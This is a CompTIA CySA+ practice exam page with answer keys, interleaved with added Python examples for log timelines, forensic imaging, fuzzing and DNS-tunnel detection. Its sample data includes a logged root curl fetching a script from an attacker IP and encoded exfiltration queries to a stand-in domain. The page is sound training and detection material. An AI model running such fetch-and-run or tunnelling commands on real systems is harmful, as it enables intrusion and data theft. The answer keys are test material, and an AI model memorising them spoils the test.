CompTIA Cyber Security Analyst (CySA+) Practice Exams 2019 Set 5

A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given a list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output a report?


Options are :

  • OSSIM
  • Syslog
  • Kali
  • Splunk (Correct)

Answer : Splunk
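What "timeline analysis, keyword search and a report" means in practice, as an added example that is not part of the original page and not Splunk code: log lines in two different formats (syslog-style and Apache combined-style, both constructed here) are normalised onto one timestamp axis, sorted, searched and rendered. This is the work a SIEM does for you across many hosts and formats; the year on the syslog lines is assumed, because syslog timestamps do not carry one.

```python
"""Added example: a minimal log timeline / keyword-search tool in plain Python.
Not code from the original page. The log lines below are constructed and the
two formats (syslog-style and Apache combined-style) are assumptions."""
import re
from datetime import datetime

# Constructed sample logs from one host, in two formats.
SYSLOG_LINES = [
    "Mar 12 08:15:01 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51022 ssh2",
    "Mar 12 08:15:03 web01 sshd[2211]: Accepted password for root from 203.0.113.7 port 51022 ssh2",
    "Mar 12 08:17:40 web01 sudo: root : TTY=pts/0 ; COMMAND=/usr/bin/curl http://203.0.113.7/x.sh",
]
APACHE_LINES = [
    '203.0.113.7 - - [12/Mar/2019:08:14:55 +0000] "GET /admin HTTP/1.1" 200 512 "-" "curl/7.64.0"',
    '198.51.100.3 - - [12/Mar/2019:08:16:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

SYSLOG_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$")
APACHE_RE = re.compile(r"^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] \"(?P<req>[^\"]*)\" (?P<status>\d{3})")

def parse_syslog(line, year=2019):
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    # syslog lines carry no year; the caller supplies one (an assumption)
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "source": "syslog", "host": m["host"], "msg": m["msg"]}

def parse_apache(line):
    m = APACHE_RE.match(line)
    if not m:
        return None
    # parse the offset, then drop it so all events compare as naive UTC
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
    return {"ts": ts, "source": "apache", "host": m["ip"], "msg": f"{m['req']} -> {m['status']}"}

def build_timeline(syslog_lines, apache_lines):
    """Merge both sources into one list ordered by normalised timestamp."""
    events = [e for e in map(parse_syslog, syslog_lines) if e]
    events += [e for e in map(parse_apache, apache_lines) if e]
    return sorted(events, key=lambda e: e["ts"])

def search(timeline, keyword):
    """Case-insensitive keyword search over host and message fields."""
    kw = keyword.lower()
    return [e for e in timeline if kw in e["msg"].lower() or kw in e["host"].lower()]

def report(timeline):
    """Fixed-width text report, one event per line."""
    return "\n".join(
        f"{e['ts']:%Y-%m-%d %H:%M:%S} {e['source']:<6} {e['host']:<14} {e['msg']}" for e in timeline
    )

if __name__ == "__main__":
    tl = build_timeline(SYSLOG_LINES, APACHE_LINES)
    print(report(tl))
    print("--- events mentioning 203.0.113.7 ---")
    print(report(search(tl, "203.0.113.7")))
```

The merged view is what exposes the sequence: an admin-panel probe from 203.0.113.7, a failed then accepted root login from the same address, then a root-level curl back to it. Grepping each file separately shows the pieces but not the order.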

An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server's BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed?


Options are :

  • File integrity monitoring
  • TPM data sealing (Correct)
  • Anti-malware application
  • Host-based IDS

Answer : TPM data sealing

As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with information defined in the SOW. Which of the following types of information should be considered based on information traditionally found in the SOW? (Select two.)


Options are :

  • Timing of the scan (Correct)
  • Incident response policies
  • Maintenance windows
  • Excluded hosts (Correct)
  • IPS configuration
  • Contents of the executive summary report

Answer : Timing of the scan Excluded hosts

An analyst reviews a recent report of vulnerabilities on a company's financial application server. Which of the following should the analyst rate as being of the HIGHEST importance to the company's environment?


Options are :

  • Susceptibility to XSS
  • Use of old encryption algorithms
  • Banner grabbing
  • Remote code execution (Correct)
  • SQL injection

Answer : Remote code execution

A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as root and browsing the Internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following security architecture areas should the administrator recommend review and modification? (Select TWO).


Options are :

  • Log aggregation and analysis (Correct)
  • Software assurance
  • Encryption
  • Acceptable use policies (Correct)
  • Network isolation and separation
  • Password complexity

Answer : Log aggregation and analysis Acceptable use policies

A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP?


Options are :

  • Guests using the wireless network should provide valid identification when registering their wireless devices. (Correct)
  • The corporate network should have a wireless infrastructure that uses open authentication standards.
  • Sponsored guest passwords must be at least ten characters in length and contain a symbol.
  • The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.

Answer : Guests using the wireless network should provide valid identification when registering their wireless devices.

A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to perform?


Options are :

  • Inform users regarding the affected systems.
  • Shut down all server interfaces.
  • Inform management of the incident. (Correct)
  • Continue monitoring critical systems.

Answer : Inform management of the incident.

The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premise implementation. A critical application that is subject to Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid cloud deployment model. Which of the following should be conducted FIRST?


Options are :

  • Develop a request for proposal.
  • Perform a risk assessment.
  • Review the SLA for FISMA compliance.
  • Review current security controls. (Correct)

Answer : Review current security controls.

A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings were set to redirect all traffic through an unknown proxy. This type of attack is known as which of the following?


Options are :

  • Phishing
  • Shoulder surfing
  • Social engineering
  • Man-in-the-middle (Correct)

Answer : Man-in-the-middle

An investigation showed a worm was introduced from an engineer's laptop. It was determined the company does not provide engineers with company-owned laptops, which would be subject to company policy and technical controls. Which of the following would be the MOST secure control to implement?


Options are :

  • Utilize a jump box that is only allowed to connect to clients from the management network.
  • Deploy a company-wide approved engineering workstation for management access. (Correct)
  • Deploy HIDS on all engineer-provided laptops, and put a new router in the management network.
  • Implement role-based group policies on the management network for client access.

Answer : Deploy a company-wide approved engineering workstation for management access.

After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment?


Options are :

  • Cross training
  • Separation of duties (Correct)
  • Succession planning
  • Automated reporting

Answer : Separation of duties

As part of the SDLC, software developers are testing the security of a new web application by inputting large amounts of random data. Which of the following types of testing is being performed?


Options are :

  • Input validation
  • Regression testing
  • Fuzzing (Correct)
  • Stress testing

Answer : Fuzzing

A cybersecurity analyst is completing an organization's vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report?


Options are :

  • Asset isolation
  • Log disposition
  • Organizational governance
  • Processor utilization
  • Virtual hosts (Correct)

Answer : Virtual hosts

A cybersecurity analyst is hired to review the security posture of a company. The cybersecurity analyst notices a very high network bandwidth consumption due to SYN floods from a small number of IP addresses. Which of the following would be the BEST action to take to support incident response?


Options are :

  • Block all SYN packets.
  • Install a packet capturing tool.
  • Apply ingress filters at the routers. (Correct)
  • Increase the companys bandwidth.

Answer : Apply ingress filters at the routers.

An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation?


Options are :

  • Cookie stealing
  • Zero-day attack (Correct)
  • Session hijack
  • Known malware attack

Answer : Zero-day attack

A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application is accessible over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability?


Options are :

  • Change the default password, whitelist specific source IP addresses, and require two-factor authentication.
  • Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication. (Correct)
  • Whitelist all corporate IP blocks, require an alphanumeric passphrase for the default password, and require two-factor authentication.
  • Rename the URL to a more obscure name, whitelist all corporate IP blocks, and require two-factor authentication.

Answer : Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.

Which of the following commands would a security analyst use to make a copy of an image for forensics use?


Options are :

  • wget
  • dd (Correct)
  • rm
  • touch

Answer : dd
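Why dd is the forensic answer and not just a copy command, as an added example that is not from the original page: the real acquisition is typically `dd if=/dev/sdX of=evidence.img bs=512 conv=noerror,sync` (through a hardware write blocker) followed by `sha256sum evidence.img`, and the Python below spells out what those options do. The "device" is a constructed in-memory byte string whose unreadable sector is simulated; both are assumptions made for illustration.

```python
"""Added example (not code from the original page): the behaviour of `dd`
when imaging evidence, written out in Python so the error handling and the
hash verification are visible. The "device" is a constructed in-memory byte
string and its unreadable sector is simulated; both are assumptions."""
import hashlib

BLOCK_SIZE = 512  # sector size, the role of dd's bs= parameter

class FakeDevice:
    """Read-only byte source that fails on one chosen sector, imitating a
    bad sector on a real disk (constructed for the example)."""
    def __init__(self, data, bad_sector=None):
        self._data = data
        self._bad = bad_sector

    @property
    def sectors(self):
        return (len(self._data) + BLOCK_SIZE - 1) // BLOCK_SIZE

    def read_block(self, index):
        if index == self._bad:
            raise IOError(f"Input/output error at sector {index}")
        start = index * BLOCK_SIZE
        return self._data[start:start + BLOCK_SIZE]

def image_device(dev, noerror_sync=True):
    """Copy every sector into an image, hashing as it is written.
    noerror_sync=True mirrors dd's conv=noerror,sync: an unreadable sector is
    replaced with zero padding instead of aborting, so later offsets in the
    image still line up with the original disk.
    Returns (image_bytes, sha256_hex, indices_of_bad_sectors)."""
    out = bytearray()
    bad = []
    digest = hashlib.sha256()
    for i in range(dev.sectors):
        try:
            block = dev.read_block(i)
        except IOError:
            if not noerror_sync:
                raise
            bad.append(i)
            block = b""
        block = block.ljust(BLOCK_SIZE, b"\x00")  # pad a short or failed read to a full sector
        out += block
        digest.update(block)
    return bytes(out), digest.hexdigest(), bad

def verify_image(image, expected_sha256):
    """Re-hash the image; the hash recorded at acquisition time is what the
    chain-of-custody paperwork and any later verification compare against."""
    return hashlib.sha256(image).hexdigest() == expected_sha256

if __name__ == "__main__":
    # constructed evidence: four full sectors of distinct fill bytes plus a partial fifth
    evidence = b"".join(bytes([n]) * BLOCK_SIZE for n in range(1, 5)) + b"tail"
    img, sha, bad = image_device(FakeDevice(evidence, bad_sector=2))
    print(f"imaged {len(img)} bytes, sha256={sha}, unreadable sectors={bad}")
    print("image verifies:", verify_image(img, sha))
```

Two practitioner points the code makes concrete: without `sync` a failed read would shift every later byte in the image, silently breaking filesystem offsets; and the hash is taken over the image as written, so the list of zero-filled sectors must be recorded alongside it or the image will not reproduce the hash of the original disk.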

An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular attack vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting?


Options are :

  • Availability analysis
  • Behavior analysis
  • Business analysis
  • Trend analysis (Correct)

Answer : Trend analysis

Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company A's conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company B's network. The security architect for Company A wants to ensure partners from Company B are able to gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports. Which of the following can be employed to allow this?


Options are :

  • SAML
  • ACL
  • SIEM
  • NAC (Correct)
  • MAC

Answer : NAC

A software assurance lab is performing a dynamic assessment on an application by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab performing AND during which phase of the SDLC should this occur? (Select two.)


Options are :

  • Prototyping phase (Correct)
  • Static code analysis
  • Requirements phase
  • Planning phase
  • Fuzzing (Correct)
  • Behavior modeling

Answer : Prototyping phase Fuzzing
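Fuzzing, as it appears in both of the questions above (random input into a web application; random data sets driving an application to an error condition), is easier to reason about with a concrete target. The following is an added example, not code from the original page: a constructed length-prefixed record format, a parser that trusts its length field, a hardened parser that rejects malformed input cleanly, and a small mutation fuzzer that distinguishes a clean rejection (ValueError) from a crash (any other exception). The format, both parsers and the seed input are assumptions made for illustration.

```python
"""Added example (not code from the original page): a mutation fuzzer run
against a small length-prefixed record parser, first in a deliberately
fragile form and then hardened. The record format, both parsers and the
seed input are constructed for illustration."""
import random
import struct

# Constructed format: repeated records of [1-byte type][2-byte big-endian length][payload].
# Type 1 = raw data, type 2 = data with a "check" value of sum(payload) % len(payload).

def encode(records):
    return b"".join(bytes([t]) + struct.pack(">H", len(p)) + p for t, p in records)

def buggy_parse(data):
    """Fragile parser: trusts the length field and never checks for truncation."""
    pos, out = 0, []
    while pos < len(data):
        rtype = data[pos]
        length = struct.unpack(">H", data[pos + 1:pos + 3])[0]   # struct.error if header is cut short
        payload = data[pos + 3:pos + 3 + length]
        check = sum(payload) % len(payload) if rtype == 2 else None  # ZeroDivisionError on empty payload
        out.append((rtype, payload, check))
        pos += 3 + length
    return out

def hardened_parse(data):
    """Same format, but every malformed input is rejected with ValueError."""
    pos, out = 0, []
    while pos < len(data):
        if len(data) - pos < 3:
            raise ValueError("truncated record header")
        rtype = data[pos]
        length = int.from_bytes(data[pos + 1:pos + 3], "big")
        end = pos + 3 + length
        if end > len(data):
            raise ValueError("length field exceeds available data")
        payload = data[pos + 3:end]
        if rtype == 1:
            check = None
        elif rtype == 2:
            if not payload:
                raise ValueError("type-2 record needs a non-empty payload")
            check = sum(payload) % len(payload)
        else:
            raise ValueError(f"unknown record type {rtype}")
        out.append((rtype, payload, check))
        pos = end
    return out

def mutate(data, rng):
    """One random mutation: bit flip, byte overwrite, junk insertion or truncation."""
    buf = bytearray(data)
    op = rng.randrange(4)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif op == 1 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == 2:
        i = rng.randrange(len(buf) + 1)
        buf[i:i] = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    else:
        del buf[rng.randrange(len(buf) + 1):]
    return bytes(buf)

def fuzz(parser, seeds, iterations=2000, seed=1):
    """Feed mutated inputs to parser. A ValueError is a clean rejection; any
    other exception is a crash. Returns {exception name: first triggering input}."""
    rng = random.Random(seed)
    crashes = {}
    for _ in range(iterations):
        case = mutate(rng.choice(seeds), rng)
        try:
            parser(case)
        except ValueError:
            continue
        except Exception as exc:
            crashes.setdefault(type(exc).__name__, case)
    return crashes

VALID = encode([(1, b"hello"), (2, b"\x01\x02\x03")])  # constructed seed input

if __name__ == "__main__":
    print("buggy parser crashes:", fuzz(buggy_parse, [VALID]))
    print("hardened parser crashes:", fuzz(hardened_parse, [VALID]))
```

The fuzzer never needs to know where the bugs are; truncating the seed inside a header or zeroing a length field is enough to surface both crash classes within a few hundred iterations, which is why this kind of testing belongs early, while the code is still a prototype, rather than after release.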

A security operations team was alerted to abnormal DNS activity coming from a user's machine. The team performed a forensic investigation and discovered a host had been compromised. Malicious code was using DNS as a tunnel to extract data from the client machine, which had been leaked and transferred to an unsecured public Internet site. Which of the following BEST describes the attack?


Options are :

  • Cache poisoning
  • Data exfiltration (Correct)
  • Phishing
  • Pharming

Answer : Data exfiltration
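The "abnormal DNS activity" that triggered the alert above has a recognisable shape: many unique, long, high-entropy leftmost labels under one domain, often as TXT queries. The following is an added example, not code from the original page, that scores query logs on exactly those features. The log lines are constructed, the field layout (timestamp, client, query type, name) is assumed, and "registered domain = last two labels" is a simplification that a real tool would replace with a public-suffix list.

```python
"""Added example (not from the original page): spotting DNS tunnelling in
query logs by the per-domain pattern the attack leaves behind, namely many
unique, long, high-entropy subdomain labels. The log lines are constructed;
the field layout and the last-two-labels domain rule are assumptions."""
import math
from collections import defaultdict

# Constructed query log: "<timestamp> <client> <qtype> <qname>"
SAMPLE_LOG = [
    "2019-03-12T08:15:01Z 10.0.0.5 A www.example.com",
    "2019-03-12T08:15:02Z 10.0.0.5 A mail.example.com",
    "2019-03-12T08:15:04Z 10.0.0.5 A cdn.example.com",
    "2019-03-12T08:15:05Z 10.0.0.5 A api.vendor-example.org",
    "2019-03-12T08:15:07Z 10.0.0.5 A login.vendor-example.org",
    # encoded data chunks leaving as subdomain labels (constructed tunnel traffic)
    "2019-03-12T08:15:10Z 10.0.0.5 TXT 0f1e2d3c4b5a6978a9b8c7d6e5f40312.t1.exfil-example.net",
    "2019-03-12T08:15:11Z 10.0.0.5 TXT 7e1f8c2a9d3b46055d0c4e8b2f6a9173.t1.exfil-example.net",
    "2019-03-12T08:15:12Z 10.0.0.5 TXT b3a2f1e0d9c87654c6e4a2f0b8d91357.t1.exfil-example.net",
    "2019-03-12T08:15:13Z 10.0.0.5 TXT a9b8c7d6e5f403127e1f8c2a9d3b4605.t1.exfil-example.net",
    "2019-03-12T08:15:14Z 10.0.0.5 TXT 5d0c4e8b2f6a9173b3a2f1e0d9c87654.t1.exfil-example.net",
    "2019-03-12T08:15:15Z 10.0.0.5 TXT c6e4a2f0b8d913570f1e2d3c4b5a6978.t1.exfil-example.net",
]

def shannon_entropy(s):
    """Bits per character; encoded data scores high, dictionary words score low."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def parse_line(line):
    ts, client, qtype, qname = line.split()
    labels = qname.lower().rstrip(".").split(".")
    base = ".".join(labels[-2:])                 # assumption: registered domain = last two labels
    leftmost = labels[0] if len(labels) > 2 else ""
    return {"ts": ts, "client": client, "qtype": qtype, "base": base, "label": leftmost}

def analyze(lines, min_unique=5, min_len=20, min_entropy=3.0):
    """Per registered domain: how many distinct leftmost labels were queried,
    how long and how random they are, and what share were TXT queries."""
    by_domain = defaultdict(list)
    for line in lines:
        q = parse_line(line)
        by_domain[q["base"]].append(q)
    result = {}
    for base, qs in by_domain.items():
        labels = [q["label"] for q in qs]
        unique = len(set(labels))
        avg_len = sum(map(len, labels)) / len(labels)
        avg_ent = sum(map(shannon_entropy, labels)) / len(labels)
        txt_ratio = sum(q["qtype"] == "TXT" for q in qs) / len(qs)
        result[base] = {
            "queries": len(qs),
            "unique_subdomains": unique,
            "avg_label_len": avg_len,
            "avg_entropy": avg_ent,
            "txt_ratio": txt_ratio,
            # all three must hold, so a busy CDN with many short names is not flagged
            "flagged": unique >= min_unique and avg_len >= min_len and avg_ent >= min_entropy,
        }
    return result

def flagged_domains(lines):
    return sorted(d for d, f in analyze(lines).items() if f["flagged"])

if __name__ == "__main__":
    for base, f in analyze(SAMPLE_LOG).items():
        flag = "TUNNEL?" if f["flagged"] else "ok"
        print(f"{base:<22} q={f['queries']:<3} uniq={f['unique_subdomains']:<3} "
              f"len={f['avg_label_len']:5.1f} H={f['avg_entropy']:4.2f} txt={f['txt_ratio']:.2f} {flag}")
```

The thresholds are assumptions to tune against your own baseline; the caveat is that legitimate services (content-hash hostnames, some anti-spam lookups, certificate transparency checks) also generate high-entropy labels, so the unique-label count and query volume matter as much as entropy alone.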

A security analyst is assisting with a computer crime investigation and has been asked to secure a PC and deliver it to the forensic lab. Which of the following items would be MOST helpful to secure the PC? (Choose three.)


Options are :

  • Chain of custody form (Correct)
  • Tamper-proof seals (Correct)
  • Drive eraser
  • Network tap
  • Write blockers
  • Faraday cage (Correct)

Answer : Chain of custody form Tamper-proof seals Faraday cage

The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation's quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?


Options are :

  • Input validation testing
  • Security regression testing
  • User acceptance testing (Correct)
  • Static code testing

Answer : User acceptance testing

A security analyst at a small regional bank has received an alert that nation states are attempting to infiltrate financial institutions via phishing campaigns. Which of the following techniques should the analyst recommend as a proactive measure to defend against this type of threat?


Options are :

  • System isolation
  • Mandatory access control
  • Bastion host
  • Honeypot
  • Location-based NAC (Correct)

Answer : Location-based NAC

External users are reporting that a web application is slow and frequently times out when attempting to submit information. Which of the following software development best practices would have helped prevent this issue?


Options are :

  • Input validation
  • Fuzzing
  • Regression testing
  • Stress testing (Correct)

Answer : Stress testing

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation?


Options are :

  • The analyst is not using the standard approved browser.
  • The alert is unrelated to the analyst's search.
  • The analyst has prefetch enabled on the browser in use. (Correct)
  • The analyst accidentally clicked a link related to the indicator.

Answer : The analyst has prefetch enabled on the browser in use.

Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment?


Options are :

  • Place the malware on a virtual server running SIFT and begin analysis.
  • Place the malware on a virtual server connected to a VLAN.
  • Place the malware on an isolated virtual server disconnected from the network. (Correct)
  • Place the malware in a virtual server that is running Windows and is connected to the network.

Answer : Place the malware on an isolated virtual server disconnected from the network.

A red team actor observes it is common practice to allow cell phones to charge on company computers, but access to the memory storage is blocked. Which of the following are common attack techniques that take advantage of this practice? (Choose two.)


Options are :

  • A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes) (Correct)
  • A USB attack that turns the connected device into a rogue access point that spoofs the configured wireless SSIDs
  • A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking (Correct)
  • A Bluetooth pairing attack called Snarfing that allows Bluetooth connections on blocked device types if physically connected to a USB port
  • A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack

Answer : A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes) A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking

A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT?


Options are :

  • Implement continuous monitoring.
  • Start the change control process. (Correct)
  • Rescan to ensure the vulnerability still exists.
  • Begin the incident response process.

Answer : Start the change control process.
